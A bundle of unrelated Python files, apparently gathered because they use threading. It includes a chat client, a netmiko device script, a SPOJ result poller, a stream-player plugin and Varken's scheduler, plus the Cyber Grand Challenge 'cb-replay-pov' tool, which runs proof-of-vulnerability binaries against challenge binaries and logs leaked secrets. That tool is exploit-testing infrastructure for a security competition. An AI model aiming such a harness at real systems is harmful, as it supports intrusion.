update_thread.start()
#
# def main():
# # create reader to obtain live data from IMU
# imu_data = Reader('localhost', 60009)
# imu_data.start()
#
# # get Madgwick filter running to calc orientation
# orientation = Madgwick(imu_data)
# orientation.start()
#
# while True:
# time.sleep(0.5)
# print(orientation.roll(), orientation.pitch(), orientation.yaw())
# # print(orientation.q.w, orientation.q.x, orientation.q.y, orientation.q.z)
# pass
#
# if __name__=='__main__':
# main()
|
client.py
|
import socket
import threading
host = "127.0.0.1"
port = 5000
nickname = input("Choose a nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
def receive():
while True:
try:
message = client.recv(1024).decode("ascii")
if message == "NICK":
client.send(nickname.encode("ascii"))
else:
print(message)
except:
print("an error occurred")
client.close()
break
def write():
while True:
message = f'{nickname}: {input(":::")}'
client.send(message.encode("ascii"))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
Ex2.py
|
#!/usr/bin/env python
import yaml
from pprint import pprint
from netmiko import ConnectHandler
from multiprocessing import Process,Queue
import pdb
STREAM = '../../.netmiko.yml'
with open(STREAM) as file_in:
devices = yaml.load(file_in)
#pprint(devices)
def command_runner(gear):
output = {}
connector = ConnectHandler(**gear)
#print()
output_header = '\n' + '*' * 40 + '\n'
hostname = connector.find_prompt()
output_footer = '\n' + '*' * 40 + '\n'
output_value = connector.send_command("show version")
output[hostname] = output_header + output_value + output_footer
process_queue.put(output)
#pdb.set_trace()
process_queue = Queue(maxsize = 50)
procs = []
for k,v in devices.items():
#print(k,v)
process = Process(target=command_runner, args=(v, ) )
print(type(process))
process.start()
procs.append(process)
for proc in procs:
proc.join()
while not process_queue.empty():
output_dict = process_queue.get()
for i,j in output_dict.items():
print("Hostname: {}".format(i))
print("{}".format(j))
print()
print()
print()
|
Judging.py
|
import os
import re
import sys
import time
import getpass
import urllib2
import threading
import test
def wait(arg1 , stop_event):
try :
while (not stop_event.is_set()):
sys.stdout.write('.')
sys.stdout.flush()
stop_event.wait(0.3)
except Exception as error :
print "Error Ocurred while running thread !!"
def get_status(url,ID):
try :
htmltext = urllib2.urlopen(url)
except Exception as error:
print "Unable to Fetch Result !!"
print error
htmltext = htmltext.read(13000)
pat = "id=\"statusres_"+ ID + "\".*?>(.*?)</td>"
match = re.search(pat,htmltext,re.DOTALL)
if not match :
print "Error in parsing the webpage !!"
return
resp = match.group(1)
resp = resp.replace("\n","")
resp = resp.replace("\t" , "")
resp = resp.strip()
result = resp.find("runtime error")
if result >= 0 :
match = re.search("<a.*?>(.*?)</a>",resp,re.DOTALL)
if match :
resp = "runtime error" + '(' + match.group(1) + ')'
match = re.search("runtime error(.+)",resp,re.DOTALL)
if match :
resp = "runtime error" + '(' + match.group(1).replace(" ","") + ')'
else : resp = "runtime error"
return resp,htmltext
def parse(htmltext , ID):
ID = ID.strip()
pattern = "id=\"statustime_" + ID + "\">.*?<a.*?>(.*?)</a>"
match = re.search(pattern,htmltext,re.DOTALL)
if match :
match = match.group(1)
match = match.replace("\n","")
match = match.replace("\t","")
match = match.strip()
else:
match = "0.0"
time = match
pattern = "id=\"statusmem_" + ID + "\">(.*?)</td>.*?<p>(.*?)</p>(.*?)/td>"
match = re.search(pattern,htmltext,re.DOTALL)
if match:
memory = match.group(1)
memory = memory.replace("\n","")
memory = memory.replace("\t","")
memory = memory.strip()
else : memory = "0M"
if match :
lang = match.group(2)
lang = lang.replace("\n","")
lang = lang.replace("\t","")
lang= lang.strip()
st = match.group(3)
temp = re.search("class=.*?>(.*?)</p>",st,re.DOTALL)
if temp :
lang = lang + '('+ temp.group(1) + ')'
else : lang = "Default"
return time,memory ,lang
def check(status , htmltext,ID):
status = status.strip()
if status.startswith("accepted") :
print
print "Hooray !! Your solution got " + status
extime , memory , lang = parse(htmltext , ID)
print "Execution Time : %s \t" % extime,
print "Memory Used : %s \t" % memory ,
print "Language : %s " % lang
return True
elif status.startswith("wrong") :
print
print "Oops !! Wrong Answer .Check the boundary constraint "
extime , memory , lang = parse(htmltext , ID)
print "Execution Time : %s \t" % extime,
print "Memory Used : %s \t" % memory ,
print "Language : %s " % lang
return True
elif status.startswith("time") :
print
print "Oops !! Time Limit Exceeded .Try to optimize your algorithm"
extime , memory , lang = parse(htmltext , ID)
print "Execution Time : %s \t" % extime,
print "Memory Used : %s \t" % memory ,
print "Language : %s " % lang
return True
elif status.startswith("runtime"):
print
print "Oops !! %s.Don't get frustrated , Try again !" % status
extime , memory , lang = parse(htmltext , ID)
print "Execution Time : %s \t" % extime,
print "Memory Used : %s \t" % memory ,
print "Language : %s " % lang
return True
elif status.startswith("compilation"):
print
print "Oops !! Compilation Error "
print "Check your syntax !!"
return True
return False
def main(name,password,path,lang,code):
ID = test.style(name , password , path ,lang ,code)
if not ID :
return
ID = ID.strip()
status = ""
statusList =[]
print "Waiting for the response from the server !!"
url = "http://www.spoj.com/status/" + name
th_stop = threading.Event()
th = threading.Thread(target = wait , args=(1,th_stop))
th.daemon = True
try :
th.start()
for i in range(500):
status ,htmltext= get_status(url,ID)
if status in statusList:
pass
else :
if status.strip() == "waiting..":
pass
else :
statusList.append(status)
temp = status.replace(" ","")
temp = temp.replace(',',"")
if temp.isdigit() :
print "\n"
print "Your Score of the above problem : %s "% temp
status = "accepted"
if check(status , htmltext , ID):
break
print "\n"+status
time.sleep(1)
th_stop.set()
except Exception as error :
print error
if __name__ == '__main__':
main()
|
cb-replay-pov.py
|
#!/usr/bin/env python
"""
CB POV / Poll communication verification tool
Copyright (C) 2014 - Brian Caswell <bmc@lungetech.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
This tool allows for deterministic communication to a CGC Challenge Binary
using a Challenge Binary as input.
1 - http://testanything.org/
"""
import subprocess as sp
import multiprocessing as mp
import random
import argparse
import os
import signal
import struct
import threading
from common import IS_WINDOWS, Timeout, TimeoutError
import challenge_runner
def get_fd(fileobj):
""" Gets the file descriptor for a given fileobject
On Unix systems this returns the result of fileno()
On Windows systems, fileno() returns a HANDLE. This will open
that HANDLE and return a CRT file descriptor
"""
if IS_WINDOWS:
import msvcrt
return msvcrt.open_osfhandle(fileobj.fileno(), os.O_TEXT)
return fileobj.fileno()
class TestFailure(Exception):
""" Exception to be used by Throw(), to allow catching of test failures """
pass
class Throw(object):
"""Throw - Perform the interactions with a CB
This class implements the basic methods to interact with a CB, verifying
the interaction works as expected.
Usage:
a = Throw((source_ip, source_port), (target_ip, target_port), POV,
timeout, should_debug)
a.run()
Attributes:
cb_paths: List of paths to all cb executables
count: Number of actions performed
debug: Is debugging enabled
failed: Number of actions that did not work as expected
passed: Number of actions that did worked as expected
pov: POV, as defined by POV()
timeout: connection timeout
"""
def __init__(self, cb_paths, pov, timeout, debug, pov_seed):
self.cb_paths = cb_paths
self.pov = pov
self.debug = debug
self.timeout = timeout
self.pov_seed = pov_seed
def log(self, data):
print "# %s" % data
def count_bits_set(self, value):
count = 0
while value:
value &= value - 1
count += 1
return count
def read_all(self, fd, data_len):
data = ''
while len(data) < data_len:
read = os.read(fd, data_len - len(data))
assert len(read)
data += read
return data
def pov_negotiate(self, pipefd):
MIN_BITS = 0
if self.debug:
self.log("negotiating")
data = self.read_all(pipefd, 4)
pov_type = struct.unpack('<L', data)[0]
assert pov_type in [1, 2], 'invalid pov type'
self.log("negotiation type: %d" % pov_type)
if pov_type == 1:
data = self.read_all(pipefd, 12)
ipmask, regmask, regnum = struct.unpack('<LLL', data)
accept = True
if self.count_bits_set(ipmask) < MIN_BITS:
self.log('not enough bits in IP mask')
accept = False
if self.count_bits_set(regmask) < MIN_BITS:
self.log('not enough bits in REG mask')
accept = False
if regnum > 7:
self.log('invalid GPR')
accept = False
if accept:
ip = random.randint(0, 0xFFFFFFFF) & ipmask
reg = random.randint(0, 0xFFFFFFFF) & regmask
self.log('type 1 masks: %08x %08x' % (ipmask, regmask))
self.log('type 1 pov: %08x %08x %d' % (ip, reg, regnum))
pov_values = struct.pack('<LL', ip, reg)
os.write(pipefd, pov_values)
if pov_type == 2:
PAGE_ADDR = 0x4347C000
PAGE_LENGTH = 0x1000
PAGE_BYTES = 4
self.log("sending page location: %d, %d, %d" % (PAGE_ADDR, PAGE_LENGTH, PAGE_BYTES))
pov_location = struct.pack('<LLL', PAGE_ADDR, PAGE_LENGTH, PAGE_BYTES)
os.write(pipefd, pov_location)
if self.debug:
self.log("getting secret")
data = self.read_all(pipefd, 4)
self.log("secret value: %s" % data.encode('hex'))
if self.debug:
self.log('done')
def _launch_pov_unix(self, mainproc, pipe):
# NOTE: This is running a forked process, free to clobber fds
# This is mostly unchanged from the original source
if self.timeout > 0:
signal.alarm(self.timeout)
# Setup fds for communication
os.dup2(mainproc.stdout.fileno(), 0)
os.dup2(mainproc.stdin.fileno(), 1)
os.dup2(pipe.fileno(), 3)
if not self.debug:
null = os.open('/dev/null', 0)
os.dup2(null, 2)
os.close(null)
args = [self.pov]
if self.pov_seed:
args.append('seed=%s' % self.pov_seed)
# Launch the POV
os.execv(self.pov, args)
exit(-1)
def _launch_pov_win(self, mainproc, pipe):
import _subprocess as _sp
cmd = [self.pov]
if self.pov_seed:
cmd.append('seed=%s' % self.pov_seed)
# The pipe HANDLE isn't inheritable, make a duplicate that is
cur_proc = _sp.GetCurrentProcess()
inh_pipe = _sp.DuplicateHandle(cur_proc, # Source process
pipe.fileno(), # HANDLE
cur_proc, # Target process
0, # Desired access
1, # Inheritable
_sp.DUPLICATE_SAME_ACCESS) # Options
# Run the POV
pov_proc = sp.Popen(cmd,
# Passing the HANDLE value here through an environment variable
# libpov will grab this and open it in fd 3
# see: include/libpov/pov.c - DLLMain
env={'POV_FD': str(int(inh_pipe))},
# stdin/out connect to the cb directly
stdin=mainproc.stdout,
stdout=mainproc.stdin)
pov_proc.wait()
def launch_pov(self, mainproc, pipe):
if IS_WINDOWS:
# Can't pass process/pipe handles to another process here, using a thread
pov_runner = threading.Thread(target=self._launch_pov_win, args=(mainproc, pipe))
pov_runner.setDaemon(True)
else:
# Fork on unix systems so we can dup fds where we want them
pov_runner = mp.Process(target=self._launch_pov_unix, args=(mainproc, pipe))
pov_runner.start()
return pov_runner
def gen_seed(self):
""" Prepare the seed that will be used in the replay """
seed = os.urandom(48)
self.log("using seed: %s" % seed.encode('hex'))
return seed.encode('hex')
def run(self):
""" Iteratively execute each of the actions within the POV
Args:
None
Returns:
None
Raises:
AssertionError: if a POV action is not in the pre-defined methods
"""
self.log('%s' % (self.pov))
# Get the seed for the tests
seed = self.gen_seed()
# Launch the challenges
self.procs, watcher = challenge_runner.run(self.cb_paths, self.timeout, seed, self.log)
# Setup and run the POV
pov_pipes = mp.Pipe(duplex=True)
pov_runner = self.launch_pov(self.procs[0], pov_pipes[1])
if self.timeout > 0:
try:
with Timeout(self.timeout + 5):
self.pov_negotiate(get_fd(pov_pipes[0]))
except TimeoutError:
self.log('pov negotiation timed out')
else:
self.pov_negotiate()
if self.debug:
self.log('waiting')
# Wait for the POV to finish and results to get logged
pov_runner.join()
watcher.join()
self.log('END REPLAY')
return self.procs[0].returncode
def run_pov(cbs, pov, timeout, debug, pov_seed):
"""
Parse and Throw a POV/Poll
Arguments:
cbs: List of paths to all cb executables
pov: filename of the POV
timeout: How long the POV communication is allowed to take
debug: Flag to enable debug logs
negotate: Should PRNG be negotiated with the CB
pov_seed: the POV seed to use
Returns:
The number of passed tests
The number of failed tests
A list containing the logs
Raises:
Exception if parsing the POV times out
"""
thrower = Throw(cbs, pov, timeout, debug, pov_seed)
return thrower.run()
def main():
""" Parse and Throw the POVs """
parser = argparse.ArgumentParser(description='Send CB based CGC Polls and POVs')
required = parser.add_argument_group(title='required arguments')
required.add_argument('--cbs', nargs='+', required=True,
help='List of challenge binaries to run on the server')
required.add_argument('files', metavar='pov', type=str, nargs='+',
help='pov file')
parser.add_argument('--timeout', required=False, type=int, default=15,
help='Connect timeout')
parser.add_argument('--debug', required=False, action='store_true',
default=False, help='Enable debugging output')
parser.add_argument('--negotiate', required=False, action='store_true',
default=False, help='The CB seed should be negotiated')
parser.add_argument('--pov_seed', required=False, type=str,
help='Specify the POV Seed')
args = parser.parse_args()
assert len(args.files)
for filename in args.files:
assert os.path.isfile(filename), "pov must be a file: %s" % repr(filename)
for pov in args.files:
status = run_pov(args.cbs, pov, args.timeout,
args.debug, args.pov_seed)
return status != 0
if __name__ == "__main__":
exit(main())
|
UPS_Main2.py
|
# ©2018 The Arizona Board of Regents for and on behalf of Arizona State University and the Laboratory for Energy And Power Solutions, All Rights Reserved.
#
# Universal Power System Controller
# USAID Middle East Water Security Initiative
#
# Developed by: Nathan Webster
# Primary Investigator: Nathan Johnson
#
# Version History (mm_dd_yyyy)
# 1.00 07_13_2018_NW
#
######################################################
# Import Libraries
from threading import Thread
from PWM_Controller import *
from Protection_Controller import *
from VFD_Controller import *
from SCIP_Controller import *
from SQL_Database_Controller import *
from Archive_Controller import *
from Initialization import *
# Declare Variables
# Run initialization to setup VFD and converter controls
Run_Initialization()
# UPS Control Threads
PWM_Thread = Thread(target=PWM_Controller_Main, args=("",))
#Protection_Thread = Thread(target=Protection_Controller_Main, args=("",))
#VFD_Thread = Thread(target=VFD_Controller_Main, args=("",))
#SCIP_Thread = Thread(target=SCIP_Controller_Main, args=("",))
#SQL_Thread = Thread(target=SQL_Database_Controller_Main, args=("",))
#Archive_Thread = Thread(target=Archive_Controller_Main,args=("",))
PWM_Thread.start()
#Protection_Thread.start()
#VFD_Thread.start()
#SCIP_Thread.start()
#SQL_Thread.start()
#Archive_Thread.start()
|
main.py
|
import traceback
import StellarPlayer
import importlib
import requests
import threading
import json
import time
import inspect
import os
import sys
from bs4 import BeautifulSoup as bs
from .sites import match
plugin_dir = os.path.dirname(__file__)
sys.path.append(plugin_dir) # for js2py
DEFAULT_IMAGE = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQMAAADCCAMAAAB6zFdcAAAAQlBMVEX///+hoaGenp6ampr39/fHx8fOzs7j4+P8/Pyvr6/d3d3FxcX29va6urqYmJjs7OzU1NSlpaW1tbWtra3n5+e/v78TS0zBAAACkUlEQVR4nO3b63KCMBCGYUwUUVEO6v3fagWVY4LYZMbZnff51xaZ5jON7CZNEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQb5tvI8qzX4/nH84XG5Upfj2ir2V2E5fZ/XpIX9saMnhkYLIkiyRJjdgMoiEDMmiQgfwM8rSu77ew2wnPoLTmwdZBs0J2BuXrYckcQm4nOoP+WcmWAbcTnUHZPy9eA24nOoN7n0HI54ToDM5k8PjluwyqgNuJzqDoaugPg8gWZ4noDAYLwuIg75fLeeHHsjNIzrZJwWwW+0DNsmEWPjiEZ5AcD8ZUu8VZ8HyQMifvBdIz+PS33i8adu+7Qn4Gn1Tdupl7rlCfQb9seosK7RkcBy1o30iVZ5CPOtDW3WhQnsF13IV3v0p3BqfJRoSpXVepzmA/24+yqeMyzRm4tqOs44lSUwa3yfgOri25av5CPRnklR33VlPnrqSZV09qMsiqSWV082xOz1uPajJ49pTM/f115k6guWa6JGjJ4N1lt8fXN2rv/vysjFaSQdFXBc/KKF04ptFPliclGVR9Bu27XCyeVOkmy5OODAZN9rYyyip/AIPJ8qIig+PoXbf7YdPdncFoSdCQQT4ZceV+MhiFMBy0hgyu0yGvOLI17KwpyGBaHK5jtt0N5GcwLw7XZdB31sRn8O+ziqYro8Vn4CwOV+k6a9Iz+PwRsKC7h+gMfMXhKu/OmuwM/MXhKq8yWnYG/uJw5Uxoy2jRGZTBZ/jboxuSM1guDtdNhKazJjiDbNMe0AxzKUVnkO+jEJxBxNtJzWCTxlNLzSB8KehJ/H+mJGYAjaDjzj9SnHZRuXZiAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECXP1XDHv7U4SNFAAAAAElFTkSuQmCC'
class MyPlugin(StellarPlayer.IStellarPlayerPlugin):
def __init__(self,player:StellarPlayer.IStellarPlayer):
super().__init__(player)
self.q = ''
self.result = [
]
self.favs = [
]
self.stop_flag = False
self.load_favs()
self.check_thread = None
self.danmu = None
self.page_url = ''
self.real_url = ''
self.danmuShow = True
def handleRequest(self, method, args):
if method == 'onPlay':
print('---------------onPlay')
url, = args
if self.real_url == url:
if self.player.getSnapshot:
time.sleep(2.0)
image = self.player.getSnapshot({'width': 100, 'height': 100})
for item in self.result:
if item['url'] == self.page_url:
item['image'] = 'data:image/png;base64,' + image
self.result = self.result
break
for item in self.favs:
if item['url'] == self.page_url:
print(f'update image {self.page_url}')
item['image'] = 'data:image/png;base64,' + image
self.favs = self.favs
self.save_favs()
break
if self.danmu:
self.danmu.stop()
self.danmu = None
self.danmu = self.create_damnu_client(self.page_url)
if self.danmu:
self.danmu.start(self.page_url, self.on_danmu)
self.danmu.run()
elif method == 'onStopPlay':
print('---------------onStop')
if self.danmu:
print('self.danmu.stop')
self.danmu.stop()
self.danmu = None
self.player.clearDanmu()
else:
print(f'handleRequest {method=} {args=}')
def show(self):
result_layout = [
[
{'type':'image', 'name':'image', 'width':120},
{'type':'space','width':10},
{
'group': [
{'type':'label','name':'name'},
{'type':'link','name':'url', 'height':20},
{'type':'link','name':'收藏','width':50, '@click': 'on_add_fav_click'},
],
'dir':'vertical',
}
]
]
favs_layout = [
[
{'type':'image', 'name':'image', 'width':120},
{'type':'space','width':10},
{
'group': [
{'type':'label','name':'name', 'height':20},
{'type':'link','name':'url', 'height':20},
{'type':'label', 'name':'online', 'height':20, 'matchParent':True},
{
'group': [
{'type':'link','name':'播放','width':50, 'matchParent':True, '@click': 'on_play_fav_click'},
{'type':'link','name':'删除','width':50, 'matchParent':True, '@click': 'on_del_fav_click'},
]
},
# {'group':
# [
# {'type':'button','name':'删除','width':60,'matchParent':True, '@click':'on_list_del_click'},
# {'type':'button','name':'删除2','width':60,'matchParent':True, '@click':'on_list_del_click'},
# {'type':'button','name':'删除3','width':60,'matchParent':True, '@click':'on_list_del_click'},
# ]
# },
],
'dir':'vertical',
}
]
]
controls = [
{
'group': [
{'type':'label','name':'直播间地址'},
{'type':'edit','name':'search','height':30, 'width':0.6, 'label': ' ', '@input': 'on_search_input', ':value': 'q'},
{'type':'button','name':'播放', 'height':30, 'width':0.1, '@click': 'on_play_click'},
{'type':'check', 'name':'显示弹幕', '@click': 'on_toggle_danmu_click', ':value': 'danmuShow'},
],
'height':30
},
{
'group': [
{'type':'list','name':'result', 'height': 80, 'itemheight':80, 'itemlayout': result_layout, ':value': 'result','marginSize':5},
{'type':'space', 'height':10 },
{'type':'label','name': '收藏列表', 'height':30},
{'type':'list','name':'favs', 'itemheight':80, 'itemlayout': favs_layout, ':value': 'favs','marginSize':5, 'separator': True},
],
'dir':'vertical',
'width': 1.0
},
]
if self.check_thread is None:
print("create checking thread")
self.check_thread = threading.Thread(target=self.check_thread_func, daemon=True)
self.check_thread.start()
self.player.showDanmu(self.danmuShow)
self.doModal('main', 800, 600, '看各种直播门户', controls)
def start(self):
super().start()
def stop(self):
self.stop_flag = True
super().stop()
def check_thread_func(self):
last = 0
while not self.stop_flag:
time.sleep(0.1)
if time.time() - last > 60.0 * 5: # check every 5 minitue
last = time.time()
print("thread loop")
for fav in self.favs:
if self.stop_flag:
break
time.sleep(0.1)
print(f"check {fav['url']}")
real_url, site = self.get_real_url(fav['url'])
print(f"check ret {real_url}")
fav['online'] = '在线' if real_url else '离线'
self.favs = self.favs
def danmu_thread_func(self, url):
pass
def create_damnu_client(self, url):
ret, site = match(url)
print(f'create_damnu_client {ret=} {site=}')
if ret:
danmu = site.get('danmu')
if danmu:
print(danmu)
module_name, attr_name = danmu.rsplit('.', 1)
module = importlib.import_module(f'..dmclient.{module_name}', package=__name__)
Cls = getattr(module, attr_name)
return Cls()
return None
def get_real_url(self, url):
def call_get_real_url(module, ret):
if hasattr(module, 'get_real_url'):
return module.get_real_url(ret)
for name, obj in inspect.getmembers(module):
if inspect.isclass(obj):
inst = obj(ret)
if hasattr(inst, 'get_real_url'):
return inst.get_real_url()
return False
ret, site = match(url)
if ret:
module_name = site['realurl']
print(f'get real url : {module_name}')
module = importlib.import_module(f'..real-url.{module_name}', package=__name__)
try:
real_url = call_get_real_url(module, ret)
return real_url, site
except Exception as e:
import traceback
traceback.print_exc()
return None, None
def play(self, url, caption, show_result=False):
try:
real_url, site = self.get_real_url(url)
if not real_url:
self.player and self.player.toast('main', '直播不存在或者未开播')
return
if 'key' in site:
if callable(site['key']):
real_url = site['key'](real_url)
else:
print(real_url)
real_url = real_url[site['key']]
hasattr(self.player, "clearDanmu") and self.player.clearDanmu()
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36', 'referer': url}
try:
self.player.play(real_url, caption=caption, headers=headers)
except:
self.player.play(real_url, headers=headers)
self.real_url = real_url
self.page_url = url
if show_result:
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
r = requests.get(url, headers = headers)
if r.status_code == 200:
soup = bs(r.content, 'html.parser')
title = soup.find('title')
self.result = [{
'name': title.string[:30],
'url': url,
'online': '在线',
'image': DEFAULT_IMAGE
}]
if self.player.setCaption :
self.player.setCaption(title.string)
except Exception as e:
import traceback
traceback.print_exc()
def on_danmu(self, message):
self.player.addDanmu(message)
def on_play_click(self, *args):
self.result = []
url = self.q
self.play(url, None, True)
def on_play_fav_click(self, page, listControl, item, itemControl):
url = self.favs[item]['url']
name = self.favs[item]['name']
self.play(url, name, False)
def on_add_fav_click(self, page, listControl, item, itemControl):
if len(self.result) == 0: return
url = self.result[0]['url']
if len(list(filter(lambda x: x['url'] == url, self.favs))) == 0:
self.favs = self.result + self.favs
self.result = []
self.save_favs()
def on_del_fav_click(self, page, listControl, item, itemControl):
self.favs.pop(item)
self.favs = self.favs
self.save_favs()
def on_toggle_danmu_click(self, *a):
self.player.showDanmu(self.danmuShow)
print(f'{a=}, {self.danmuShow=}')
def save_favs(self):
f = open("favs.json", "w")
favs = []
for fav in self.favs:
favs.append({
'name': fav['name'],
'url': fav['url'],
'image': fav['image']
})
f.write(json.dumps(favs, indent=4))
f.close()
def load_favs(self):
try:
with open("favs.json") as f:
favs = json.loads(f.read())
for fav in favs:
fav['online'] = '正在检测'
if 'image' not in fav:
fav['image'] = DEFAULT_IMAGE
self.favs = favs
except FileNotFoundError:
pass
def newPlugin(player:StellarPlayer.IStellarPlayer,*arg):
plugin = MyPlugin(player)
return plugin
def destroyPlugin(plugin:StellarPlayer.IStellarPlayerPlugin):
plugin.stop()
|
Threads.py
|
import threading
import time
def worker():
print("Worker")
return
threads = []
for i in range(5):
t = threading.Thread(target=worker)
threads.append(t)
t.start()
print('')
def worker_a(num):
print ("Worker : " + str(num),end='\n')
return
threads_a = []
for i in range(5):
t = threading.Thread(target=worker_a,args=(i,))
threads_a.append(t)
t.start()
def worker_thread():
print (threading.currentThread().getName() + 'Starting')
time.sleep(2)
print (threading.currentThread().getName() + 'Ending')
def my_service():
print (threading.currentThread().getName() + 'Starting')
time.sleep(3)
print (threading.currentThread().getName() + 'Ending')
t = threading.Thread(name='worker_thread',target=worker_thread)
w = threading.Thread(name='my_service',target=my_service)
t.start()
w.start()
|
Varken.py
|
import platform
import schedule
from time import sleep
from queue import Queue
from sys import version
from threading import Thread
from os import access, R_OK, getenv
from distro import linux_distribution
from os.path import isdir, abspath, dirname, join
from argparse import ArgumentParser, RawTextHelpFormatter
from logging import getLogger, StreamHandler, Formatter, DEBUG
from varken import structures # Needed to check version of python
from varken.ombi import OmbiAPI
from varken.unifi import UniFiAPI
from varken import VERSION, BRANCH
from varken.sonarr import SonarrAPI
from varken.radarr import RadarrAPI
from varken.iniparser import INIParser
from varken.dbmanager import DBManager
from varken.helpers import GeoIPHandler
from varken.tautulli import TautulliAPI
from varken.sickchill import SickChillAPI
from varken.varkenlogger import VarkenLogger
PLATFORM_LINUX_DISTRO = ' '.join(x for x in linux_distribution() if x)
def thread():
while schedule.jobs:
job = QUEUE.get()
a = job()
print(a)
if a is not None:
schedule.clear(a)
QUEUE.task_done()
if __name__ == "__main__":
parser = ArgumentParser(prog='varken',
description='Command-line utility to aggregate data from the plex ecosystem into InfluxDB',
formatter_class=RawTextHelpFormatter)
parser.add_argument("-d", "--data-folder", help='Define an alternate data folder location')
parser.add_argument("-D", "--debug", action='store_true', help='Use to enable DEBUG logging')
opts = parser.parse_args()
DATA_FOLDER = abspath(join(dirname(__file__), 'data'))
templogger = getLogger('temp')
templogger.setLevel(DEBUG)
tempch = StreamHandler()
tempformatter = Formatter('%(asctime)s : %(levelname)s : %(module)s : %(message)s', '%Y-%m-%d %H:%M:%S')
tempch.setFormatter(tempformatter)
templogger.addHandler(tempch)
if opts.data_folder:
ARG_FOLDER = opts.data_folder
if isdir(ARG_FOLDER):
DATA_FOLDER = ARG_FOLDER
if not access(DATA_FOLDER, R_OK):
templogger.error("Read permission error for %s", DATA_FOLDER)
exit(1)
else:
templogger.error("%s does not exist", ARG_FOLDER)
exit(1)
# Set Debug to True if DEBUG env is set
enable_opts = ['True', 'true', 'yes']
debug_opts = ['debug', 'Debug', 'DEBUG']
if not opts.debug:
opts.debug = True if any([getenv(string, False) for true in enable_opts
for string in debug_opts if getenv(string, False) == true]) else False
# Initiate the logger
vl = VarkenLogger(data_folder=DATA_FOLDER, debug=opts.debug)
vl.logger.info('Starting Varken...')
vl.logger.info('Data folder is "%s"', DATA_FOLDER)
vl.logger.info(u"%s %s (%s%s)", platform.system(), platform.release(), platform.version(),
' - ' + PLATFORM_LINUX_DISTRO if PLATFORM_LINUX_DISTRO else '')
vl.logger.info(u"Python %s", version)
vl.logger.info("Varken v%s-%s", VERSION, BRANCH)
CONFIG = INIParser(DATA_FOLDER)
DBMANAGER = DBManager(CONFIG.influx_server)
QUEUE = Queue()
if CONFIG.sonarr_enabled:
for server in CONFIG.sonarr_servers:
SONARR = SonarrAPI(server, DBMANAGER)
if server.queue:
at_time = schedule.every(server.queue_run_seconds).seconds
at_time.do(QUEUE.put, SONARR.get_queue).tag(f"sonarr-{server.id}-get_queue")
if server.missing_days > 0:
at_time = schedule.every(server.missing_days_run_seconds).seconds
at_time.do(QUEUE.put, SONARR.get_missing).tag(f"sonarr-{server.id}-get_missing")
if server.future_days > 0:
at_time = schedule.every(server.future_days_run_seconds).seconds
at_time.do(QUEUE.put, SONARR.get_future).tag(f"sonarr-{server.id}-get_future")
if CONFIG.tautulli_enabled:
GEOIPHANDLER = GeoIPHandler(DATA_FOLDER)
schedule.every(12).to(24).hours.do(QUEUE.put, GEOIPHANDLER.update)
for server in CONFIG.tautulli_servers:
TAUTULLI = TautulliAPI(server, DBMANAGER, GEOIPHANDLER)
if server.get_activity:
at_time = schedule.every(server.get_activity_run_seconds).seconds
at_time.do(QUEUE.put, TAUTULLI.get_activity).tag(f"tautulli-{server.id}-get_activity")
if server.get_stats:
at_time = schedule.every(server.get_stats_run_seconds).seconds
at_time.do(QUEUE.put, TAUTULLI.get_stats).tag(f"tautulli-{server.id}-get_stats")
if CONFIG.radarr_enabled:
for server in CONFIG.radarr_servers:
RADARR = RadarrAPI(server, DBMANAGER)
if server.get_missing:
at_time = schedule.every(server.get_missing_run_seconds).seconds
at_time.do(QUEUE.put, RADARR.get_missing).tag(f"radarr-{server.id}-get_missing")
if server.queue:
at_time = schedule.every(server.queue_run_seconds).seconds
at_time.do(QUEUE.put, RADARR.get_queue).tag(f"radarr-{server.id}-get_queue")
if CONFIG.ombi_enabled:
for server in CONFIG.ombi_servers:
OMBI = OmbiAPI(server, DBMANAGER)
if server.request_type_counts:
at_time = schedule.every(server.request_type_run_seconds).seconds
at_time.do(QUEUE.put, OMBI.get_request_counts).tag(f"ombi-{server.id}-get_request_counts")
if server.request_total_counts:
at_time = schedule.every(server.request_total_run_seconds).seconds
at_time.do(QUEUE.put, OMBI.get_all_requests).tag(f"ombi-{server.id}-get_all_requests")
if server.issue_status_counts:
at_time = schedule.every(server.issue_status_run_seconds).seconds
at_time.do(QUEUE.put, OMBI.get_issue_counts).tag(f"ombi-{server.id}-get_issue_counts")
if CONFIG.sickchill_enabled:
for server in CONFIG.sickchill_servers:
SICKCHILL = SickChillAPI(server, DBMANAGER)
if server.get_missing:
at_time = schedule.every(server.get_missing_run_seconds).seconds
at_time.do(QUEUE.put, SICKCHILL.get_missing).tag(f"sickchill-{server.id}-get_missing")
if CONFIG.unifi_enabled:
for server in CONFIG.unifi_servers:
UNIFI = UniFiAPI(server, DBMANAGER)
at_time = schedule.every(server.get_usg_stats_run_seconds).seconds
at_time.do(QUEUE.put, UNIFI.get_usg_stats).tag(f"unifi-{server.id}-get_usg_stats")
# Run all on startup
